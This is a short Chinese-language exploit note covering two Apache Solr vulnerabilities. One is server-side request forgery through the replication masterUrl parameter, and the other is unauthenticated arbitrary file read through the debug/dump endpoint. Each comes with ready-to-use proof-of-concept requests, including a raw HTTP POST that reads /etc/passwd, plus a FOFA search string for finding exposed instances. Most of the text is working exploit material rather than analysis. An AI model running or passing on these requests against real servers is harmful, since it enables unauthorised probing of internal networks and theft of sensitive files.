1、SSRF
描述
Apache Solr存在服务器端请求伪造漏洞。攻击者可以传递特定参数,使得服务端发起请求,成功利用该漏洞可造成内网信息探测。 影响范围:Apache Solr < 8.8.2 fofa app=”APACHE-Solr”
POC & EXP
# 这里masterUrl为你想访问的链接
http://127.0.0.1:8983/solr/db/replication\?command=fetchindex\&masterUrl=http://xxxx
2、任意文件读取漏洞
描述
Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 影响版本:Apache Solr <= 8.8.1
POC &EXP
构造读取/etc/passwd的包
POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 29
Content-Type: application/x-www-form-urlencoded
Connection: close
stream.url=file:///etc/passwd